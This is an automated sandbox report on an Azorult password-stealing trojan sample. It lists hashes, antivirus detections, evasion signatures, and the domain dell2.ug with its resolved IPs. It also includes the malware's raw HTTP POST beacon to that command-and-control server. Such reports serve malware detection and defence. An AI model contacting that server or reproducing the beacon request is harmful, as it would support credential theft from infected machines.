- * MalFamily: "Azorult"
- * MalScore: 10.0
- * File Name: "Exes_37cc975a1257bf260308fe30e1d3e7ee.exe"
- * File Size: 233984
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "cbc5c6867c6caeaa956ccf8828d1618422dc87b21fd3a78653a0c601b29533a8"
- * MD5: "37cc975a1257bf260308fe30e1d3e7ee"
- * SHA1: "934dd52f58b4889d94c52a53afb6a44e61422839"
- * SHA512: "5ae462b90109105e1b83a03a9c7d35c0cd81a53a95590b104f6161da6a3ad3eed5551476835fdfae98e0347a8b52dd7de1b443bd5d48d8712900019a34248eb6"
- * CRC32: "E1023269"
- * SSDEEP: "6144:TB7zXtjRsqev8Xzgim10MbZcAFd01DhMy30PyutDi:xzXtjRsqU8DNmpLj01DhPUhi"
- * Process Execution:
- "Njc1G9rPzs.exe"
- * Executed Commands:
- * Signatures Detected:
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "Behavioural detection: Executable code extraction",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "Njc1G9rPzs.exe, PID 2420"
- "Description": "Performs HTTP requests potentially not found in PCAP.",
- "Details":
- "url": "dell2.ug:80//1/index.php"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "suspicious_request": "http://dell2.ug/1/index.php"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://dell2.ug/1/index.php"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "Njc1G9rPzs.exe (2420) called API NtQueryInformationThread 3575525 times"
- "Description": "Stack pivoting was detected when using a critical API",
- "Details":
- "process": "Njc1G9rPzs.exe:2420"
- "Description": "CAPE detected the Azorult malware family",
- "Details":
- "Description": "File has been identified by 36 Antiviruses on VirusTotal as malicious",
- "Details":
- "McAfee": "RDN/Generic.grp"
- "K7GW": "Trojan ( 00556bde1 )"
- "Cybereason": "malicious.a1257b"
- "TrendMicro": "Trojan.Win32.SODINOK.SM.hp"
- "F-Prot": "W32/Kryptik.ABS.gen!Eldorado"
- "ESET-NOD32": "a variant of Win32/Kryptik.GVWF"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "GData": "Win32.Trojan-Stealer.Azorult.XA12HC"
- "Kaspersky": "Trojan-PSW.Win32.Azorult.aajh"
- "Alibaba": "TrojanPSW:Win32/Azorult.3c911882"
- "Avast": "Win32:Trojan-gen"
- "Tencent": "Win32.Trojan-qqpass.Qqrob.Lmbk"
- "Endgame": "malicious (high confidence)"
- "Sophos": "Mal/Generic-S"
- "F-Secure": "Trojan.TR/Kryptik.avhqr"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.Rootkit.dh"
- "FireEye": "Generic.mg.37cc975a1257bf26"
- "SentinelOne": "DFI - Suspicious PE"
- "Cyren": "W32/Kryptik.ABS.gen!Eldorado"
- "Webroot": "W32.Malware.gen"
- "Avira": "TR/Kryptik.avhqr"
- "Microsoft": "TrojanSpy:Win32/Banload.AAA!bit"
- "AegisLab": "Trojan.Multi.Generic.4!c"
- "ZoneAlarm": "Trojan-PSW.Win32.Azorult.aajh"
- "AhnLab-V3": "Trojan/Win32.MalPe.C3449305"
- "Acronis": "suspicious"
- "Malwarebytes": "Trojan.MalPack.GS"
- "Rising": "Trojan.Generic@ML.92 (RDMK:JrTuIYbmiz1qmDjjv7tvpw)"
- "Ikarus": "Trojan.Win32.Krypt"
- "Fortinet": "W32/GenKryptik.DRFK!tr"
- "AVG": "Win32:Trojan-gen"
- "Panda": "Trj/GdSda.A"
- "CrowdStrike": "win/malicious_confidence_80% (W)"
- "Qihoo-360": "HEUR/QVM10.2.771F.Malware.Gen"
- "Description": "Collects information to fingerprint the system",
- "Details":
- * Started Service:
- * Mutexes:
- "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726"
- * Modified Files:
- * Deleted Files:
- * Modified Registry Keys:
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "dell2.ug",
- "answers":
- "data": "194.67.90.196",
- "type": "A"
- "data": "149.154.69.146",
- "type": "A"
- "data": "62.109.17.122",
- "type": "A"
- * Domains:
- "ip": "149.154.69.146",
- "domain": "dell2.ug"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
- "uri": "http://dell2.ug/1/index.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "dell2.ug",
- "version": "1.1",
- "path": "/1/index.php",
- "data": "POST /1/index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: dell2.ug\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- "country_name": "Russian Federation",
- "ip": "149.154.69.146",
- "inaddrarpa": "",
- "hostname": "dell2.ug"
- * Network Communication - IRC: